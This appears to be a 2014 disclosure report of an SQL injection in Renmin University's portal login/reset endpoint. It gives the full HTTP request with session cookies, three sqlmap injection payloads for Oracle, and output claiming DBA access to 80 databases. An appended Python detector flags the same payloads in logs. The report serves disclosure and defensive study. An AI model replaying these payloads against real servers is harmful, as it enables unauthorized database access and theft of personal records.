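2014-11-07: Details reported to the vendor; awaiting vendor handling.
2014-11-12: The vendor chose to ignore the vulnerability; details disclosed to the public.
80 databases, one of them with 340 tables, over a million records, DBA privileges, the whole database can be dumped, and then it gets routed as a "small vendor". Yep, that's right!
Renmin University of China unified authentication page
https://cas.ruc.edu.cn/cas/login
SQL injection at the login; POST request: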
POST /account/confirm.do?method=checkfs HTTP/1.1
Host: portal.ruc.edu.cn
Proxy-Connection: keep-alive
Content-Length: 32
Accept: */*
Origin: http://portal.ruc.edu.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://portal.ruc.edu.cn/account/confirm/reset1.jsp
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: neusoftrucportal=5mLFJVlbmZngfJh7TNbZ2yhm2XhstjG4WvywhLgWRT6MjcGyr6s2!608312459; BIGipServerruc_portal=3909593280.42271.0000; JSESSIONID=81FVJVkpTgZL17XvgDhy2c9Dp1hP4Yy5kQHmTJTKFSnQh64xxbWn!-1716597195; BIGipServeraccount=1762109632.2336.0000
RA-Ver: 2.7.0
RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bcc

account=admin&fs=1&mobile=1111&mail=
Proof: 80 databases, one of them with 340 tables, DBA privileges. I won't list the rest; there is a lot anyway.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: account
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: account=admin' AND 2590=2590 AND 'SkMM'='SkMM&fs=1&mobile=1111&mail=

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: account=admin' AND 4993=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(109)||CHR(121)||CHR(99)||CHR(113)||(SELECT (CASE WHEN (4993=4993) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(122)||CHR(100)||CHR(113)) AND 'XsTJ'='XsTJ&fs=1&mobile=1111&mail=

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: account=admin' AND 3183=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'oXbv'='oXbv&fs=1&mobile=1111&mail=
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
current user is DBA: True
available databases [80]:
Database: IDC_U_PUB
[340 tables]
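A log-triage check for the three techniques in the sqlmap output above, as an added example that is not part of the original report: it decodes a urlencoded POST body and flags any field whose value matches one of those payload shapes. The function name `classify`, the regexes and the last sample body are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs

# One pattern per technique named in the sqlmap output (regexes are this example's own).
SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s*(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"UTL_INADDR\s*\.\s*GET_HOST_ADDRESS\s*\(", re.I),
    "time-based (heavy query)": re.compile(
        r"FROM\s+ALL_USERS\s+\w+\s*(?:,\s*ALL_USERS\s+\w+\s*){2,}", re.I),
}

def classify(body):
    """Map each form field in a urlencoded POST body to the techniques it matches."""
    hits = {}
    # parse_qs undoes %xx and '+' encoding, so encoded payloads are matched too.
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            for label, pattern in SIGNATURES.items():
                if pattern.search(value):
                    hits.setdefault(field, []).append(label)
    return hits

# Sample bodies: [0] is the original request body from the report, [1]-[3] are the
# payloads sqlmap printed, [4] is a constructed percent-encoded variant of [1].
SAMPLES = [
    "account=admin&fs=1&mobile=1111&mail=",
    "account=admin' AND 2590=2590 AND 'SkMM'='SkMM&fs=1&mobile=1111&mail=",
    "account=admin' AND 4993=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(109)||CHR(121)"
    "||CHR(99)||CHR(113)||(SELECT (CASE WHEN (4993=4993) THEN 1 ELSE 0 END) FROM DUAL)"
    "||CHR(113)||CHR(119)||CHR(122)||CHR(100)||CHR(113)) AND 'XsTJ'='XsTJ&fs=1&mobile=1111&mail=",
    "account=admin' AND 3183=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,"
    "ALL_USERS T4,ALL_USERS T5) AND 'oXbv'='oXbv&fs=1&mobile=1111&mail=",
    "account=admin%27+AND+2590%3D2590+AND+%27SkMM%27%3D%27SkMM&fs=1&mobile=1111&mail=",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(classify(body) or "clean", "<-", body[:50])
```

Signature matching of this kind only helps when reviewing request logs; the flaw itself is closed by binding `account` as a query parameter instead of concatenating it into the SQL text.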
Severity: No impact (ignored by vendor)
Ignored at: 2014-11-12 16:30
None yet